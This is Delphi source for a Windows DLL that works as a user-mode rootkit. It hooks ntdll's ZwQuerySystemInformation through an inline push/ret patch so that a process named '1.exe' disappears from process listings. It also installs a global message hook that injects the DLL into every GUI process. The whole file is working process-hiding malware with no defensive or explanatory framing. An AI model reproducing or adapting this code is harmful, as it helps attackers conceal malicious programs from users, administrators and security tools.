library Hide;

uses
  Windows,
  NativeAPI;

type
 OldCode = packed record
  One: dword;
  two: word;
 end;


far_jmp = packed record
  PuhsOp: byte;
  PushArg: pointer;
  RetOp: byte;
 end;

var
 JmpZwq: far_jmp;
 OldZwq: OldCode;
 PtrZwq: pointer;

Function TrueZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): NTStatus; stdcall;
var
 Written: dword;
begin
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
                     @OldZwq, SizeOf(OldCode), Written);

  Result := ZwQuerySystemInformation(ASystemInformationClass,
                                     ASystemInformation,
                                     ASystemInformationLength,
                                     AReturnLength);

  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
                     @JmpZwq, SizeOf(far_jmp), Written);
end;



Function NewZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): NTStatus; stdcall;
var
 Info, Prev: PSYSTEM_PROCESSES;
begin
 Result := TrueZwQuerySystemInformation(ASystemInformationClass,
                                        ASystemInformation,
                                        ASystemInformationLength,
                                        AReturnLength);

 if (ASystemInformationClass = SystemProcessesAndThreadsInformation) and
    (Result = STATUS_SUCCESS) then
    begin
      Info := ASystemInformation;
      while(Info^.NextEntryDelta > 0) do
       begin
         Prev := Info;
         Info := pointer(dword(Info) + Info^.NextEntryDelta);
         if lstrcmpiw(Info^.ProcessName.Buffer, '1.exe') = 0 then
           Prev^.NextEntryDelta := Prev^.NextEntryDelta + Info^.NextEntryDelta;
       end;
    end;
end;

Procedure SetHook();
var
 Bytes: dword;
begin
  PtrZwq  := GetProcAddress(GetModuleHandle('ntdll.dll'),
                            'ZwQuerySystemInformation');
  ReadProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
  JmpZwq.PuhsOp  := $68;
  JmpZwq.PushArg := @NewZwQuerySystemInformation;
  JmpZwq.RetOp   := $C3;
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Bytes);
end;

Procedure Unhook();
var
 Bytes: dword;
begin
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
end;
Function MessageProc(code : integer; wParam : word;
                    lParam : longint) : longint; stdcall;
begin
 CallNextHookEx(0, Code, wParam, lparam);
 Result := 0;
end;

Procedure SetGlobalHookProc();
begin
 SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
 Sleep(INFINITE);
end;
//

Procedure SetGlobalHook();
var
 hMutex: dword;
 TrId: dword;
begin
 hMutex := CreateMutex(nil, false, 'ProcHideHook');
 if GetLastError = 0 then
 CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId) else
 CloseHandle(hMutex);
end;

procedure DLLEntryPoint(dwReason: DWord);
begin
  case dwReason of
    DLL_PROCESS_ATTACH: begin
                          SetGlobalHook();
                          SetHook();
                        end;
    DLL_PROCESS_DETACH: begin
                          Unhook();
                        end;
  end;
end;


begin
 DllProc := @DLLEntryPoint;
 DLLEntryPoint(DLL_PROCESS_ATTACH);
end.